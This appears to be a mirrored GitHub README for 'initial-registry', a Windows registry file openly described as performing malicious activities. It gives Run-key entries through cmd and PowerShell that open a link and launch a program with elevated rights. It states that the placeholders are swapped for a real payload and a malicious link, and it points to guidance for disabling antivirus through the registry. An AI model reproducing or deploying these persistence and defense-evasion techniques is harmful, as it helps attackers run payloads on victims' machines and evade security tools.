Giter Site home page Giter Site logo

x1nerama / initial-registry Goto Github PK

View Code? Open in Web Editor NEW

This project forked from s3n4t0r-0x0/initial-registry

0.0 0.0 0.0 17 KB

It is a registry file that performs malicious activities when the fresh button is pressed, Such as start a malicious link, making an execution for payload, or running a malicious command line in CMD or PowerShell

initial-registry's Introduction

Initial-Registry

It is a simple registry file that performs malicious activities when the refresh button is pressed, Such as start a malicious link, making an execution for payload, or running a malicious command line in CMD or PowerShell

1706980167902 Specifically through the registry.

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] "TaskManagerURL"="cmd /c start http://www.example.com && calc.exe"

The harmful activities are carried out through the CMD, but the operator may also need to execute these activities from the PowerShell and not the CMD, which is why I put this other registry as an alternative to the CMD.

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] "TaskManagerURL"="powershell -Command "Start-Process 'http://www.example.com'; Start-Process 'calc.exe' -Verb RunAs""

Of course, in the real operation, Calc.exe will be replaced by payload, and example.com will be replaced by the malicious link. with all these malicious activities, you may be exposed to detection, and also since we use the Windows Registry in this operation, we may also use the Windows Registry or after the Windows registry to create a disable for defenses

received_757618392508240.mp4

I used this site for resources to desible defenses through the Windows registry by setting Windows Registry  Activity in the disable.txt https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/windows-persistence/#disable-antivirus-and-security

Note: After clicking on the registry file and setting the payload input, you may need to restart the Windows machine so that you can run the exploit.

initial-registry's People

Contributors

s3n4t0r-0x0 avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.